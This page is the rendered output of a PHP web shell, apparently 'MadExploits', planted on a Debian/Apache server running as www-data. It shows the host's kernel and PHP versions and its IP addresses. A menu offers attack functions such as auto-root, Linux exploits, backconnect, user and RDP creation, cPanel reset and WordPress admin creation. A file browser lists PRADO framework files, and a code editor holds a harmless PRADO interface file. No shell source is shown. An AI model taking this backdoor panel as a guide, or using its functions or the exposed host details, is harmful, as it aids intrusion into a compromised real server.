Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.188.62.10
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
prado4.3.2 /
Web /
Services /
[ HOME SHELL ]
Name
Size
Permission
Action
IFeedContentProvider.php
1.32
KB
-rw-r--r--
TFeedService.php
4.33
KB
-rw-r--r--
TJsonResponse.php
1.19
KB
-rw-r--r--
TJsonRpcProtocol.php
4.42
KB
-rw-r--r--
TJsonService.php
4.66
KB
-rw-r--r--
TPageConfiguration.php
12.35
KB
-rw-r--r--
TPageService.php
19.1
KB
-rw-r--r--
TRpcApiProvider.php
2.34
KB
-rw-r--r--
TRpcException.php
640
B
-rw-r--r--
TRpcProtocol.php
2.61
KB
-rw-r--r--
TRpcServer.php
1.72
KB
-rw-r--r--
TRpcService.php
6.21
KB
-rw-r--r--
TSoapServer.php
8.4
KB
-rw-r--r--
TSoapService.php
9.04
KB
-rw-r--r--
TXmlRpcProtocol.php
2.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : IFeedContentProvider.php
<?php /** * TFeedService and TFeed class file * * @author Qiang Xue <qiang.xue@gmail.com> * @author Knut Urdalen <knut.urdalen@gmail.com> * @license https://github.com/pradosoft/prado/blob/master/LICENSE */ namespace Prado\Web\Services; /** * IFeedContentProvider interface. * * IFeedContentProvider interface must be implemented by a feed class who * provides feed content. * * @author Qiang Xue <qiang.xue@gmail.com> * @author Knut Urdalen <knut.urdalen@gmail.com> * @since 3.1 */ interface IFeedContentProvider { /** * Initializes the feed content provider. * This method is invoked (before {@link getFeedContent}) * when the feed provider is requested by a user. * @param \Prado\Xml\TXmlElement $config configurations specified within the <feed> element * corresponding to this feed provider when configuring {@link TFeedService}. */ public function init($config); /** * @return string feed content in proper XML format */ public function getFeedContent(); /** * Sets the content type of the feed content to be sent. * Some examples are: * RSS 1.0 feed: application/rdf+xml * RSS 2.0 feed: application/rss+xml or application/xml or text/xml * ATOM feed: application/atom+xml * @return string the content type for the feed content. * @since 3.1.1 */ public function getContentType(); }
Close